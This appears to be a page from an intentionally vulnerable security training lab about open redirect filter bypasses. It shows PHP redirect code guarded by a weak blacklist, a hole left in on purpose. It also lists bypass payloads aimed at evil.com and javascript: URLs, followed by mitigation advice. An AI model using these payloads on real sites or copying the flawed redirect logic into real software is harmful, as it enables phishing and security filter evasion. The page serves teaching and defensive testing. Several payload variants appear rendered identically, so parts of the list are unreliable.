Open Redirect Lab 5 - Advanced Filter Bypasses

Difficulty: High

Lab Overview

This lab demonstrates various filtering mechanisms and their bypass techniques for open redirect vulnerabilities. Test different bypass methods against different filters.

Objective: Master advanced filter bypass techniques and understand how inadequate filtering can be exploited.

Backend Source Code

// Simulate different filtering mechanisms
function applyFilter($url, $type) {
    switch ($type) {
        case 'protocol':
            // Block common protocols
            $blocked = ['http://', 'https://', 'ftp://', 'file://'];
            foreach ($blocked as $protocol) {
                if (stripos($url, $protocol) === 0) {
                    return false; // Blocked
                }
            }
            return $url;
        // ... other filters
    }
}

$filtered_url = applyFilter($redirect_url, $bypass_type);
if (!empty($redirect_url) && $filtered_url !== false) {
    header("Location: " . $filtered_url);
    exit();
}

Test Input Form

Available Filters

Filter Types:

basic - No filtering
protocol - Blocks common protocols
domain - Blocks external domains
javascript - Blocks javascript: protocol
double_encode - Blocks URL encoding

Current Filter:

basic

Vulnerability Details

Type: Advanced Open Redirect with Filter Bypasses
Severity: High
Parameters: url, bypass
Method: Various filtering bypass techniques
Issue: Inadequate filtering mechanisms

Bypass Payloads by Filter Type

Protocol Filter Bypasses:

//evil.com - Protocol relative URL
\/\/evil.com - Escaped slashes
ht%74p://evil.com - URL encoding
ht%74%70://evil.com - Double encoding
0x2f2fevil.com - Hex encoding

Domain Filter Bypasses:

//evil.com - Protocol relative
http://localhost@evil.com - User info bypass
http://127.0.0.1@evil.com - IP bypass
http://evil.com#localhost - Fragment bypass
http://evil.com?localhost - Query bypass

JavaScript Filter Bypasses:

javascript:alert(1) - Basic javascript
JAVASCRIPT:alert(1) - Case variation
javascript:alert(1) - HTML entity
javascript%3Aalert(1) - URL encoding
data:text/html, - Data URI

Encoding Filter Bypasses:

https://evil.com - No encoding
https%3A//evil.com - Single encoding
https%253A//evil.com - Double encoding
https://evil.com - Mixed encoding

Advanced Attack Scenarios

Bypassing WAF and security filters
Advanced social engineering attacks
Protocol confusion attacks
Encoding-based filter evasion
Domain validation bypasses
Client-side security control bypasses

Advanced Mitigation Strategies

Implement multiple layers of validation
Use whitelist-based validation instead of blacklists
Normalize URLs before validation
Implement proper URL parsing and validation
Use Content Security Policy (CSP) headers
Regular security testing and filter updates
Consider using redirect tokens instead of direct URLs